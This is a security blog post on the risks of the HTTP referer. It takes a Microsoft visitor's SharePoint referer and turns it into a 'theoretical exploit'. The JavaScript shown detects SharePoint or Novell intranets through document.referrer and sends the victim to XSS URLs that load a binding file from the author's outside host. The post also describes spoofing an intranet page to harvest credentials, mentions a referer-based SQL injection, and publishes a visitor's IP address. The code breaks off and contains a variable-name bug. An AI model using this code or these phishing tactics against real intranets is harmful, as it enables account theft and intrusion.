Theoretical Cross Referer Attack On Microsoft.

Publicated on : 1193676203
So, Microsoft visited me once again. And yes I see everything that happens on this site through my logs. Again, they send their referer to me. Now, I can tell you that is a bad idea. I talked about it before, and amazingly people continue to send their referer. So, instead of complaining again, I'll show you a way how you can own Microsoft based upon their referer they send. Please understand: turn off your referer string inside your browser, because this can and will hurt you someday, with this I also mean Feed readers, Google, GMail, Hotmail et al.

Firstly, 131.107.0.105 (tide535.microsoft.com) dropped by. Then leaving this referer string in the logs: http://sharepoint/sites/SVT/Portal/Lists/Issues/DispForm1.aspx?List={a hash}&ID=142
Okay, so it uses sharepoint. It is or was vulnerable to XSS to some degree, and there are probably more (network) vulnerabilities to Google upon. Let's use the XSS, and write only a simple Javascript to launch a quick attack. In the example below I also look for Novell, because Novell has a XSS vulnerability also. In a real attack we could launch this script as a popup under, so that when they switch browser tabs, they'll end up on their intranet because that is where they came from as we saw in the referer. Then again, we can always open a second browser tab and perform a spoofed sharepoint service page. Since they came from a similar service, they could think the spoofed page we opened is the page they originated from, where we can steal credentials. Anyway, it is possible with such little means.

So, again the moral of this whole thing is that you SHOULD disable the referer string, because it allows me to pinpoint a certain system and if you are still logged into it. Please do not trivialize this issue, because I successfully abused this one time by launching and SQL injection attack through a referer string, yes SQL injection can be performed as well on a GET request inside an Iframe, if I detect SQL server or MySQL is running. I am sorry to say this, but if you work in the security business you should know better!

Theoretical exploit:

<script>

var ref = document.referrer;

if(ref.search(/sharepoint/i) !=-1) {
var sharepoint = true;
}

if(ref.search(/servlet/i) !=-1) {
var novell = true;
}

if(sharepoint) {
try {
var uri = 'http://127.0.0.1/default.aspx/';
var payload1 = '"><STYLE>BODY{-moz-binding:url("http://0x000000.com/xss.xml#xss")}</STYLE><"';
location.href = uri+payload1;
} catch(e) {
var uri = false;
}
}

if(novel) {
try {
var uri = 'http://127.0.0.1/servlet/webacc?User.Id=';
var payload1 = '"><STYLE>BODY{-moz-binding:url("http://0x000000.com/xss.xml#xss")}</STYLE><"';
location.href = uri+payload1;
} catch(e) {
var uri =